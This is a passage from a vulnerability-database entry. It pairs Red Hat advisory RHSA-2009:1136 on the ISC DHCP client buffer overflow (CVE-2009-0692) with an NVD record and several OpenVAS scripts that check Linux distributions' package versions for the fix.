ID RHSA-2009:1136 Type redhat Reporter RedHat Modified 2017-09-08T12:19:27
Description
The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows
individual devices on an IP network to get their own network configuration
information, including an IP address, a subnet mask, and a broadcast
address.
The Mandriva Linux Engineering Team discovered a stack-based buffer
overflow flaw in the ISC DHCP client. If the DHCP client were to receive a
malicious DHCP response, it could crash or execute arbitrary code with the
permissions of the client (root). (CVE-2009-0692)
Users of DHCP should upgrade to these updated packages, which contain a
backported patch to correct this issue.
{"cve": [{"lastseen": "2017-09-29T14:26:31", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.", "modified": "2017-09-28T21:33:58", "published": "2009-07-14T16:30:00", "id": "CVE-2009-0692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0692", "title": "CVE-2009-0692", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-26T08:55:41", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65772", "id": "OPENVAS:65772", "title": "SLES10: Security update for dhclient", "type": "openvas", "sourceData": "#\n#VID slesp2-dhcp-6335\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhclient\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65772);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for dhclient\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:43", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.", "modified": "2017-07-12T00:00:00", "published": "2009-07-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64386", "id": "OPENVAS:64386", "title": "RedHat Security Advisory RHSA-2009:1136", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1136.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1136 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64386);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1136\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1136.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:03", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-803-2", "modified": "2017-12-01T00:00:00", "published": "2010-01-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840379", "id": "OPENVAS:840379", "title": "Ubuntu Update for dhcp3 vulnerability USN-803-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_803_2.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for dhcp3 vulnerability USN-803-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to\n fix the vulnerability was not properly applied on Ubuntu 8.10 and higher.\n Even with the patch improperly applied, the default compiler options\n reduced the vulnerability to a denial of service. Additionally, in Ubuntu\n 9.04 and higher, users were also protected by the AppArmor dhclient3\n profile. This update fixes the problem.\n\n Original advisory details:\n \n It was discovered that the DHCP client as included in dhcp3 did not verify\n the length of certain option fields when processing a response from an IPv4\n dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a\n malicious dhcp server, a remote attacker could cause a denial of service or\n execute arbitrary code as the user invoking the program, typically the\n 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker\n should only be able to cause a denial of service in the DHCP client. In\n Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3\n profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-803-2\";\ntag_affected = \"dhcp3 vulnerability on Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-803-2/\");\n script_id(840379);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"803-2\");\n script_cve_id(\"CVE-2009-0692\");\n script_name(\"Ubuntu Update for dhcp3 vulnerability USN-803-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:09", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-12.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064434", "id": "OPENVAS:136141256231064434", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-12 (dhcp)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow in dhclient as included in the ISC DHCP implementation\nallows for the remote execution of arbitrary code with root\nprivileges.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=277729\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-12.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64434\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-12 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.1-r1\"), vulnerable: make_list(\"lt 3.1.1-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:21", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65690", "id": "OPENVAS:65690", "title": "SLES11: Security update for dhcp-client", "type": "openvas", "sourceData": "#\n#VID 8344cd148acb6a76268d2b1462cf9a03\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhcp-client\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=515599\");\n script_id(65690);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for dhcp-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.1.1~7.13.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64439", "id": "OPENVAS:64439", "title": "Slackware Advisory SSA:2009-195-01 dhcp", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_195_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient.\n\nNote that dhclient is not the default DHCP client in Slackware's networking\nscripts, dhcpcd is. However, if you use dhclient on a network where someone\ncould deploy a hostile DHCP server, you should upgrade to the new package.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-195-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-195-01\";\n \nif(description)\n{\n script_id(64439);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-195-01 dhcp \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i386-1_slack9.0\", 